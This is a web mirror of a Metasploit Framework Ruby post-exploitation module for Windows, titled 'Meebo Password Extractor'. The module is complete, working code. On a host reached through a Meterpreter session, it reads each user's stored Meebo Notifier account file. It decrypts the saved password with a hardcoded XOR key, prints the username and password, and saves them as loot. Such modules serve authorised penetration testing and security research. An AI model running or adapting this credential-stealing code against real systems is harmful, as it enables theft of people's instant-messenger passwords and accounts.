Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/meebo.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Auxiliary::Report
8
include Msf::Post::Windows::UserProfiles
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Windows Gather Meebo Password Extractor',
15
'Description' => %q{
16
This module extracts login account password stored by
17
Meebo Notifier, a desktop version of Meebo's Online Messenger.
18
},
19
'License' => MSF_LICENSE,
20
'Author' => [
21
'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
22
'Unknown', # SecurityXploded Team, www.SecurityXploded.com
23
],
24
'Platform' => [ 'win' ],
25
'SessionTypes' => [ 'meterpreter' ],
26
'Compat' => {
27
'Meterpreter' => {
28
'Commands' => %w[
29
core_channel_eof
30
core_channel_open
31
core_channel_read
32
core_channel_write
33
stdapi_fs_stat
34
]
35
}
36
},
37
'Notes' => {
38
'Stability' => [CRASH_SAFE],
39
'SideEffects' => [],
40
'Reliability' => []
41
}
42
)
43
)
44
end
45
46
def run
47
grab_user_profiles.each do |user|
48
next if user['AppData'].nil?
49
50
accounts = user['AppData'] + '\\Meebo\\MeeboAccounts.txt'
51
52
next if accounts.empty?
53
54
stat = begin
55
session.fs.file.stat(accounts)
56
rescue StandardError
57
nil
58
end
59
next if stat.nil?
60
61
parse_txt(accounts)
62
end
63
end
64
65
def parse_txt(file)
66
creds = Rex::Text::Table.new(
67
'Header' => 'Meebo Instant Messenger Credentials',
68
'Indent' => 1,
69
'Columns' =>
70
[
71
'User',
72
'Password',
73
'Protocol'
74
]
75
)
76
77
config = client.fs.file.new(file, 'r')
78
parse = config.read
79
80
if (parse =~ /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/)
81
epass = ::Regexp.last_match(1)
82
protocol = ::Regexp.last_match(2).to_i
83
username = ::Regexp.last_match(3)
84
else
85
print_error('Could not extract credentials from file')
86
return
87
end
88
89
case protocol
90
when 0
91
protocol = 'Meebo'
92
when 1
93
protocol = 'AIM'
94
when 2
95
protocol = 'Yahoo IM'
96
when 3
97
protocol = 'Windows Live'
98
when 4
99
protocol = 'Google Talk'
100
when 5
101
protocol = 'ICQ'
102
when 6
103
protocol = 'Jabber'
104
when 7
105
protocol = 'Myspace IM'
106
end
107
108
passwd = decrypt(epass)
109
print_good("*** Protocol: #{protocol} User: #{username} Password: #{passwd} ***")
110
creds << [username, passwd, protocol]
111
config.close
112
113
if passwd.nil? || username.nil?
114
print_status('Meebo credentials have not been found')
115
return
116
end
117
118
print_status('Storing data...')
119
path = store_loot(
120
'meebo.user.creds',
121
'text/csv',
122
session,
123
creds.to_csv,
124
'meebo_user_creds.csv',
125
'Meebo Notifier User Credentials'
126
)
127
128
print_good("Meebo Notifier user credentials saved in: #{path}")
129
rescue StandardError => e
130
print_error("An error has occurred: #{e}")
131
end
132
133
def decrypt(epass)
134
magicarr = [
135
4, 240, 122, 53, 65, 19, 163, 124, 109,
136
73, 187, 3, 34, 93, 15, 138, 11, 153, 148, 147, 146,
137
222, 129, 160, 199, 104, 240, 43, 89, 105, 204, 236,
138
253, 168, 96, 48, 158, 143, 173, 60, 215, 104, 112,
139
149, 15, 114, 107, 4, 92, 149, 48, 177, 42, 133, 124,
140
152, 63, 137, 2, 40, 84, 131
141
]
142
143
plaintext = [epass].pack('H*').unpack('C*')
144
145
for i in 0..plaintext.length - 1 do
146
plaintext[i] ^= magicarr[i]
147
end
148
149
return plaintext.pack('C*')
150
end
151
end
152
153